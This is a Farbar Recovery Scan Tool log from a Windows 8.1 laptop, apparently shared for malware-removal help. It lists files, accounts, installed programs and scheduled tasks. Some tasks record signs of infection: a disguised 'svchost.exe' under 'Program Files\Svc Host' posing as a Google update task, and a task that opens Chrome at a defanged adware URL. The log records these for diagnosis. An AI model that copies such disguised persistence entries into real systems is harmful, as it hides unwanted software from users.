2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda Softworks
2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\Program Files (x86)\Bethesda Softworks
2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Users\owner\AppData\Local\PAYDAY 2
2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\AGEIA Technologies
2015-12-13 15:06 - 2016-01-10 14:56 - 00001188 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Express Zip File Compression.lnk
2015-12-13 15:06 - 2015-12-13 15:06 - 00374903 _____ C:\Users\owner\Downloads\Athenas *** MH4G 0.81b.rar
2015-12-11 09:48 - 2016-01-09 18:47 - 00000000 ____D C:\WINDOWS\Minidump

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-10 21:09 - 2015-04-08 11:23 - 00000000 ____D C:\Users\owner\AppData\Roaming\Spotify
2016-01-10 21:09 - 2013-08-22 06:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-01-10 21:08 - 2015-04-08 11:25 - 00000000 ____D C:\Users\owner\AppData\Local\Spotify
2016-01-10 21:08 - 2015-04-08 11:24 - 00000000 ____D C:\Users\owner\AppData\Roaming\uTorrent
2016-01-10 21:08 - 2015-04-02 18:05 - 00000000 ____D C:\Program Files (x86)\Steam
2016-01-10 21:08 - 2015-03-31 11:26 - 00000000 ___RD C:\Users\owner\OneDrive
2016-01-10 21:08 - 2015-03-30 19:02 - 00000912 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-10 21:04 - 2015-09-16 07:26 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-01-10 20:54 - 2015-03-30 19:02 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-10 20:52 - 2015-01-20 17:04 - 00003594 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3773202632-424774445-890114178-1001
2016-01-10 20:50 - 2014-11-21 00:44 - 00863592 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-01-10 20:50 - 2013-08-22 05:36 - 00000000 ____D C:\WINDOWS\Inf
2016-01-10 20:37 - 2015-10-17 21:14 - 00000008 __RSH C:\ProgramData\ntuser.pol
2016-01-10 20:36 - 2013-08-22 07:36 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2016-01-10 20:36 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2016-01-10 18:13 - 2013-08-22 05:36 - 00000000 ____D C:\Windows
2016-01-10 14:56 - 2015-11-24 22:00 - 00001122 _____ C:\Users\Public\Desktop\OpenOffice 4.1.2.lnk
2016-01-10 14:56 - 2015-10-26 15:43 - 00001112 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Voxal Voice Changer.lnk
2016-01-10 14:56 - 2015-04-16 18:45 - 00002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-01-10 14:56 - 2015-04-16 18:28 - 00001163 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-01-10 14:56 - 2015-04-08 11:26 - 00000877 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
2016-01-10 14:56 - 2015-03-30 20:52 - 00002523 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-01-10 14:56 - 2015-01-22 22:29 - 00001511 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-01-10 14:56 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\System
2016-01-10 14:56 - 2012-10-09 15:00 - 00002423 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office.lnk
2016-01-10 14:56 - 2012-10-09 14:53 - 00001923 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spotify.lnk
2016-01-10 14:56 - 2012-09-03 08:23 - 00001673 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer User's Manual.lnk
2016-01-10 14:56 - 2012-09-03 08:23 - 00001655 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer Quick Guide.lnk
2016-01-10 14:56 - 2012-09-03 08:10 - 00002572 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - acer.lnk
2016-01-10 14:55 - 2015-04-21 16:09 - 00000000 ____D C:\Program Files (x86)\SearchProtect
2016-01-10 13:29 - 2013-08-22 05:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-01-09 21:28 - 2015-03-12 16:27 - 00000000 ____D C:\Users\owner\AppData\Local\Deployment
2016-01-09 21:15 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-01-09 21:09 - 2015-07-20 16:05 - 00000000 ____D C:\Users\owner\AppData\Roaming\Skype
2016-01-09 21:09 - 2015-04-09 16:09 - 00551936 ___SH C:\Users\owner\Desktop\Thumbs.db
2016-01-09 19:42 - 2015-05-13 19:04 - 00000000 ____D C:\Users\owner\AppData\Local\ElevatedDiagnostics
2016-01-09 19:02 - 2012-07-25 21:26 - 00000301 _____ C:\WINDOWS\win.ini
2016-01-09 18:47 - 2015-01-23 01:16 - 00000000 ___DC C:\WINDOWS\Panther
2016-01-09 18:13 - 2015-06-07 15:45 - 00000000 ____D C:\Users\owner\AppData\Roaming\Curse Client
2016-01-09 18:00 - 2015-06-07 13:52 - 00000000 ____D C:\Users\owner\AppData\Local\NexonLauncher
2016-01-09 14:49 - 2015-02-26 12:13 - 00003910 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{59AA9515-0EFB-4314-9DA6-B2B84CDB5218}
2016-01-08 14:02 - 2012-07-25 23:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-01-04 22:00 - 2015-01-22 22:26 - 00000000 ____D C:\Users\owner
2016-01-03 21:49 - 2015-10-12 21:03 - 00000000 ____D C:\Users\owner\AppData\Roaming\TS3Client
2016-01-03 21:42 - 2015-03-30 19:19 - 00000000 ____D C:\Users\owner\AppData\Roaming\Riot Games
2016-01-03 20:37 - 2015-10-23 16:18 - 00000000 ____D C:\Users\owner\AppData\Local\Warframe
2015-12-29 13:38 - 2013-08-22 06:44 - 00513128 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-12-28 17:04 - 2015-09-16 07:26 - 00003718 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2015-12-27 17:22 - 2015-09-15 07:52 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2015-12-27 17:22 - 2012-09-03 08:15 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2015-12-25 17:54 - 2015-07-20 16:05 - 00000000 ____D C:\ProgramData\Skype
2015-12-24 12:57 - 2015-04-02 18:19 - 00000000 ____D C:\Users\owner\AppData\Local\Steam
2015-12-21 23:27 - 2015-07-20 16:06 - 00000000 ____D C:\Users\owner\AppData\Local\Skype
2015-12-21 23:27 - 2015-07-20 16:05 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-12-21 23:16 - 2012-09-03 08:15 - 00000000 ____D C:\Program Files (x86)\McAfee
2015-12-20 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\WINDOWS\System32\Tasks\NCH Software
2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\ProgramData\NCH Software
2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\Program Files (x86)\NCH Software

==================== Files in the root of some directories =======

2016-01-10 20:41 - 2016-01-10 20:41 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-01-03 06:38

==================== End of FRST.txt ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:10-01-2015 01
Ran by owner (2016-01-10 21:14:05)
Running from E:\
Windows 8.1 (X64) (2015-01-23 06:44:37)
Boot Mode: Safe Mode (minimal)
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3773202632-424774445-890114178-500 - Administrator - Disabled)
Guest (S-1-5-21-3773202632-424774445-890114178-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3773202632-424774445-890114178-1005 - Limited - Enabled)
owner (S-1-5-21-3773202632-424774445-890114178-1001 - Administrator - Enabled) => C:\Users\owner

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)
Acer Backup Manager (HKLM-x32\...\InstallShield_{9DDDF20E-9FD1-4434-A43E-E7889DBC9420}) (Version: 4.0.0.0071 - NTI Corporation)
Acer Device Fast-lane (HKLM\...\{3F62D2FD-13C1-49A2-8B5D-47623D9460D7}) (Version: 1.00.3007 - Acer Incorporated)
Acer Instant Update Service (HKLM\...\{8215A318-CC27-435E-B3EA-2E3443C8998C}) (Version: 1.00.3013 - Acer Incorporated)
Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3006 - Acer Incorporated)
Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3011 - Acer Incorporated)
AcerCloud (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.01.3115 - Acer Incorporated)
AcerCloud Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.00.3201 - Acer Incorporated)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.009.20079 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.267 - Adobe Systems Incorporated)
Agatha Christie - Death on the Nile (x32 Version: 2.2.0.98 - WildTangent) Hidden
Aloha TriPeaks (x32 Version: 2.2.0.98 - WildTangent) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{649A1FD9-5892-46AD-8DF0-C4A43FF61CB7}) (Version: 4.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{0DE0A178-AC7B-4650-806C-CF226DE03766}) (Version: 4.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Backup Manager v4 (x32 Version: 4.0.0.0071 - NTI Corporation) Hidden
BattleBlock Theater (HKLM-x32\...\Steam App 238460) (Version: - The Behemoth)
Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version: - Irrational Games)
Bloody Trapland (HKLM-x32\...\Steam App 257750) (Version: - 2Play)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version: - Gearbox Software)
Broadcom Card Reader Driver Installer (HKLM\...\{F0A7DF2F-0BE0-470F-B137-D7A19F977189}) (Version: 15.4.7.1 - Broadcom Corporation)
Broforce (HKLM-x32\...\Steam App 274190) (Version: - Free Lives)
CCleaner (HKLM\...\CCleaner) (Version: 5.13 - Piriform)
Cisco AnyConnect Secure Mobility Client (HKLM-x32\...\Cisco AnyConnect Secure Mobility Client) (Version: 3.1.10010 - Cisco Systems, Inc.)
Cisco AnyConnect Secure Mobility Client (x32 Version: 3.1.10010 - Cisco Systems, Inc.) Hidden
clear.fi Media (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.01.3108 - Acer Incorporated)
clear.fi Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.01.3108 - Acer Incorporated)
clear.fi SDK - Video 2 (x32 Version: 2.1.1925 - CyberLink Corp.) Hidden
clear.fi SDK- Movie 2 (x32 Version: 2.1.2008 - CyberLink Corp.) Hidden
Cradle Of Egypt Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
CyberLink MediaEspresso 6.5 (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.3103_44819 - CyberLink Corp.)
Delicious: Emily's True Love Premium Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.13 - Dolby Laboratories Inc)
Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
eBay Worldwide (HKLM-x32\...\{A694AF57-9891-4D62-824C-7E55A1361A14}) (Version: 2.3.0630 - OEM)
ETDWare PS/2-X64 11.6.8.001_WHQL (HKLM\...\Elantech) (Version: 11.6.8.001 - ELAN Microelectronic Corp.)
Express Zip File Compression (HKLM-x32\...\ExpressZip) (Version: 2.40 - NCH Software)
Fallout 3 - The Garden of Eden Creation Kit (HKLM-x32\...\{B343B0E3-212A-40B9-8207-1BD299228F5D}) (Version: 1.00.0000 - Bethesda Softworks)
Fallout 3 (HKLM-x32\...\Steam App 22300) (Version: - Bethesda Game Studios)
Fallout: New Vegas (HKLM-x32\...\Steam App 22380) (Version: - Obsidian Entertainment)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Gun Monkeys (HKLM-x32\...\Steam App 239450) (Version: - Size Five Games)
Gyazo 3.1.6 (HKLM-x32\...\{6DB8C365-E719-4BA5-9594-10DFC244D3FD}_is1) (Version: - Nota Inc.)
HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.1.40.3 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.0.30.219 - Hewlett-Packard Company)
iCloud (HKLM\...\{B33C558F-772F-4308-A059-390FBF9BAAAE}) (Version: 5.0.2.61 - Apple Inc.)
Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3004 - Acer Incorporated)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.5.0.1207 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
iTunes (HKLM\...\{E690A491-702F-4DEC-9977-C015D1DBB57C}) (Version: 12.3.1.23 - Apple Inc.)
Java 8 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218065F0}) (Version: 8.0.650.17 - Oracle Corporation)
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Launch Manager (HKLM-x32\...\LManager) (Version: 7.0.5 - Acer Inc.)
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games)
League of Legends (x32 Version: 3.0.1 - Riot Games) Hidden
Life Is Strange™ (HKLM-x32\...\Steam App 319630) (Version: - DONTNOD Entertainment)
Live Updater (HKLM-x32\...\{EE26E302-876A-48D9-9058-3129E5B99999}) (Version: 2.00.3004 - Acer Incorporated)
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.207 - McAfee, Inc.)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{59E4543A-D49D-4489-B445-473D763C79AF}) (Version: 2.0.672.0 - Microsoft Corporation)
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version: - Microsoft)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.6029.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 37.0.1 - Mozilla)
Mystery P.I. - Curious Case of Counterfeit Cove (x32 Version: 2.2.0.98 - WildTangent) Hidden
MyWinLocker (Version: 4.0.14.35 - Egis Technology Inc.) Hidden
MyWinLocker 4 (x32 Version: 4.0.14.35 - Egis Technology Inc.) Hidden
MyWinLocker Suite (HKLM-x32\...\InstallShield_{17DF9714-60C9-43C9-A9C2-32BCAED44CBE}) (Version: 4.0.14.24 - Egis Technology Inc.)
MyWinLocker Suite (x32 Version: 4.0.14.24 - Egis Technology Inc.) Hidden
Network Secured DNS (HKLM-x32\...\Dnsio) (Version: 1.52.0.0 - Network Secured DNS)
Nexon Launcher (HKLM-x32\...\Nexon Nexon Launcher) (Version: 1.1.1 - Nexon)
NTI Media Maker 9 (HKLM-x32\...\InstallShield_{D3D5C4E8-040F-4C6F-8105-41D43CF94F44}) (Version: 9.0.2.9008 - NTI Corporation)
NTI Media Maker 9 (x32 Version: 9.0.2.9008 - NTI Corporation) Hidden
NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
Office Addin (HKLM-x32\...\{6D2BBE1D-E600-4695-BA37-0B0E605542CC}) (Version: 2.01.3200 - Acer)
Office Addin 2003 (HKLM-x32\...\{1FCC073B-CC01-4443-AD20-E559F66E6E83}) (Version: 2.01.3200 - Acer)
One Finger Death Punch (HKLM-x32\...\Steam App 264200) (Version: - Silver Dollar Games)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - )
OpenOffice 4.1.2 (HKLM-x32\...\{E6AD67BB-1C33-4AB3-A387-E0D48137AB70}) (Version: 4.12.9782 - Apache Software Foundation)
osu! (HKLM-x32\...\{12d09afc-32f6-4832-997f-7eb4503e4cdc}) (Version: latest - ppy Pty Ltd)
PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version: - OVERKILL - a Starbreeze Studio.)
Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.206 - Qualcomm Atheros Communications)
Qualcomm Atheros WiFi Driver Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 11.05 - Qualcomm Atheros)
QuickTime 7 (HKLM-x32\...\{80CEEB1E-0A6C-45B9-A312-37A1D25FDEBC}) (Version: 7.78.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6657 - Realtek Semiconductor Corp.)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Shredder (Version: 2.0.8.9 - Egis Technology Inc.) Hidden
Shredder (x32 Version: 2.0.8.9 - Egis Technology Inc.) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.105 - Skype Technologies S.A.)
Spelunky (HKLM-x32\...\Steam App 239350) (Version: - )
Spotify (HKLM-x32\...\Spotify) (Version: 0.8.4.99.ga249b5f1 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Tales of Lagoona (x32 Version: 2.2.0.110 - WildTangent) Hidden
TeamSpeak 3 Client (HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
Terraria (HKLM-x32\...\Steam App 105600) (Version: - Re-Logic)
The Binding of Isaac: Rebirth (HKLM-x32\...\Steam App 250900) (Version: - Nicalis, Inc.)
The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version: - Bethesda Game Studios)
To the Moon (HKLM-x32\...\Steam App 206440) (Version: - Freebird Games)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)
Voxal Voice Changer (HKLM-x32\...\Voxal) (Version: 1.25 - NCH Software)
Warframe (HKLM-x32\...\Steam App 230410) (Version: - Digital Extremes)
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent)
WildTangent Games App (x32 Version: 4.0.9.3 - WildTangent) Hidden
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3773202632-424774445-890114178-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {11BD7304-492C-4439-9D34-A81068D0C392} - System32\Tasks\RSPro => C:\Users\owner\AppData\Local\SearchModule\dblaunch.exe
Task: {1A212BEF-CCD3-4085-BB8E-7E2016157EFB} - System32\Tasks\GyazoUpdateTaskMachine => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
Task: {1A546FC0-FA8F-4CED-A832-6AFCE1A6B2DC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {1C4B8754-4CCC-4813-BCFA-E1BACF2369AC} - System32\Tasks\GoogleUpdateTaskAdminS-1-5-21-4287834998-254447837-4126873412-1010 => C:\Program Files\Svc Host\svchost.exe [2016-01-09] (Microsoft)
Task: {22B26FFA-C210-45FC-B7B2-6F1BE8C209B0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-07] (Google Inc.)
Task: {252A8F75-9B4E-46BC-9DE4-07746515D1B0} - System32\Tasks\GTNU_635879831232953538 => Chrome.exe hxxp://www.5web.co/wapi/tudp.php?fp=3D01-4207-D424-6ED1-6316-4FCF-39D7-0D43&amp;cc=CA
Task: {285ED968-B027-4E84-89B2-FCAE719FC597} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2012-07-04] (CyberLink)
Task: {2D2677DF-ECED-40D3-9494-DEEFF6DFCBA8} - System32\Tasks\DfGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837 => 50000
Task: {32179E0D-7013-4B23-A43B-8382F890FECB} - System32\Tasks\ALU => C:\Program Files (x86)\Acer\Live Updater\updater.exe [2012-08-29] ()
Task: {3334EB49-C86F-45BD-8145-728921B1AE75} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-26] (Apple Inc.)
